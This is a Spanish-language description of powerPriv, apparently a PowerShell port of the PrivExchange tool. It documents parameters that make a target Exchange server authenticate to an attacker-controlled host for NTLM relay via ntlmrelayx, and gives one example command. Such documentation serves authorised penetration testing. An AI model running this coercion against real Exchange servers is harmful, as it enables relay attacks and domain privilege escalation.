
Una implementación en Powershell de PrivExchange diseñada para ejecutarse bajo el contexto del usuario actual.
Una implementación en PowerShell de PrivExchange por @_dirkjan (código original aquí: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Útil para entornos en los que no se pueden ejecutar aplicaciones basadas en Python, se tienen credenciales de usuario o no se desea dejar archivos en disco. Hará que la cuenta del sistema del servidor Exchange objetivo intente autenticarse en un sistema de su elección.
-targetHostNombre de host o IP del servidor Exchange objetivo. Según la configuración de DNS, puede requerir FQDN si se usa el nombre de host. (Requerido)
-attackerHostNombre de host o IP de un sistema que usted controla, y en el que idealmente está ejecutando ntlmrelayx. Le estamos diciendo al servidor Exchange que intente autenticarse en este sistema. Según la configuración de DNS, puede requerir FQDN si se usa el nombre de host. (Requerido)
-exchangePortPuerto para intentar conectarse al servidor Exchange. El valor predeterminado es 443.
-attackerPortPuerto al que Exchange debe intentar conectarse de vuelta al atacante. El valor predeterminado es 80
-attackerPagePágina a la que le decimos al servidor Exchange que se conecte en nuestro sistema de ataque. No se requieren barras. El valor predeterminado es powerPriv.
-noSSLEstablézcalo en true si no desea usar https para conectarse inicialmente al servidor Exchange. El valor predeterminado es false (usar https).
-VersionVersión del servidor Exchange que estamos atacando. El valor predeterminado es 2013.
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
Autor: @g0ldenGunSec - Basado en la herramienta creada por @_dirkjan
Use esta herramienta únicamente en redes de su propiedad o en las que tenga permiso para realizar pruebas.